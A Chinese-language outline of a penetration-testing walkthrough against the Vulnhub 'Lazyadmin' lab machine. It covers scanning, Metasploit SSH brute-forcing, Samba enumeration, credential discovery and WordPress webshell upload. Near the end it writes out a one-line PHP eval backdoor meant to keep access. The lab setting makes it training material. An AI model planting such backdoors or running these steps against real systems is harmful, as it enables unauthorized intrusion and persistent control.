滲透測試實戰-Vulnhub-Lazyadmin

Lazyadmin - 幕布

Lazyadmin

 

• 前期信收集
  • netdiscover(arp-scan -l)探測存活主機，發現目標IP
    • IP：192.168.1.16
  • nmap 掃描
    • 開放了較多的服務如HTTP SSH Mysql等
  • nikto 掃描
    • 有不少的信息，apache版本過期，容許GET HEAD POST 等請求，php的版本，robots.txt，好像一句話木馬利用了POST請求
  • dirb 掃描
    • phpadmin，wordpress這些相關的目錄
• 探索相關服務
  • 訪問其網址
  • 查看robots.txt
    • 都是不容許的
    • 進行查看只能看到backnote裏面有些代碼，圖片
  • 發現還有wordpress的博客
  • 有phpamdin界面
    • 發現進制空密碼登陸
  • wordpress admin登陸界面
  • 當前思路
    • 先獲取phpmyadmin的用戶及密碼，
    • 在數據庫中查找有用信息
    • 若是找到了wordpress的用戶名，密碼，嘗試登陸，用wpscan掃描
    • 上傳相關的phpshell，獲取權限，再進一步探索
• 進一步瞭解
  • 前面忽略了一個重要的端口信息，6667 irc
    • 經過查詢資料
      • IRC全名爲Internet Relay Chat，是一款即時聊天工具，相似網絡聊天室，但功能更強大
      • InspIRCd是一款現代化，快速的IRC服務器，也是少數幾個IRC服務器應用程序之一，可提供高性能和穩定性，並以C ++編寫。 它是在您的服務器上構建本身的IRC的最佳解決方案之一。 它支持兩個加密庫，OpenSSL和gnutls，並支持許多服務，如anope主題。 InspIRCd基於提供許多模塊的模塊化IRCd。 若是要在InspIRCd上啓用模塊，則只需編輯modules.conf文件，併爲模塊添加新行。
  • 還有一個445端口，通過了解
    • 445端口是一個譭譽參半的端口，有了它咱們能夠在局域網中輕鬆訪問各類共享文件夾或共享打印機，但也正是由於有了它，黑客們纔有了可乘之機，他們能經過該端口偷偷共享你的硬盤，甚至會在悄無聲息中將你的硬盤格式化掉！ [1]  2017年10月，因爲病毒「壞兔子」來襲，國家互聯網應急中心等安全機構建議用戶及時關閉計算機以及網絡設備上的445和139端口
    • 說明能夠經過某種方式訪問共享文件夾
  • 安裝irc仍是比較繁瑣，暫時擱置
  • 從SSH入手
    • 在msf中查找與ssh_login相關的工具
    • 選擇auxiliary/scanner/ssh/ssh_login
      • 查看並設置相關參數，包括IP 用戶名（在網址上看到了togie，猜測頗有可能），字典
    • 運行後，成功的破解出來
      • 密碼爲12345
    • 試試看其餘的登陸界面可否成功，都不行
    • 直接登陸SSH
    • 發現這個用戶有root權限
      • 彷佛這個靶機只須要獲取root權限便可沒有flag
• 換種方式獲取權限
  • 從445端口samba服務器開始
  • samba
    • Samba是在Linux和UNIX系統上實現SMB協議的一個免費軟件，由服務器及客戶端程序構成。SMB（Server Messages Block，信息服務塊）是一種在局域網上共享文件和打印機的一種通訊協議，它爲局域網內的不一樣計算機之間提供文件及打印機等資源的共享服務。SMB協議是客戶機/服務器型協議，客戶機經過該協議能夠訪問服務器上的共享文件系統、打印機及其餘資源。經過設置「NetBIOS over TCP/IP」使得Samba不但能與局域網絡主機分享資源，還能與全世界的電腦分享資源。
  • 使用工具enum4linux
    • Enum4linux是一個用於枚舉來自Windows和Samba系統的信息的工具。 它試圖提供與之前從www.bindview.com可用的enum.exe相似的功能。 它是用Perl編寫的，基本上是一個包裝Samba工具smbclient，rpclient，net和nmblookup。
    • enum4linux 192.168.1.16
      • 發現共享目錄容許空口令
      • 有個用戶是LAZYSYSADMIN 密碼多是5位數
    • enum的使用比較重要，須要進一步瞭解
    • 使用不一樣的方式均可以鏈接到共享服務器，三種
      • https://blog.51cto.com/57388/1552978
      • 我直接在kali 文件中進行鏈接
        • 鏈接時能夠不輸入密碼，也能夠輸入前面得到的用戶名和密碼，可是在後面嘗試放入文件時被拒絕，修改文件的擴展名也不行，看來只有查看的權限
      • 查看文件
        • deet.txt
          • 這個密碼以前已經找到
        • 查看wordpress的配置文件，看到密碼
  • 登陸phpmyadmin
  • 去登陸wordpress
  • 上傳webshell
    • 可能須要將文件名修改以便能正常上傳，或者直接複製文件，可是這樣不能執行這個文件起不到做用
  • 經過上傳以前用過的一個webshell
  • 上傳在Kali上找到的shell
    • 監聽端口也能鏈接
  • 使用蟻劍和菜刀，鏈接shell
    • 更長遠的進行鏈接，須要留下後門之類的，相似前面的那個webshell
    • 接着使用一句話木馬，<?php @eval($_POST['12345']);?>
    • php文件放在了htm下，wordpress也能夠

以上內容整理於 幕布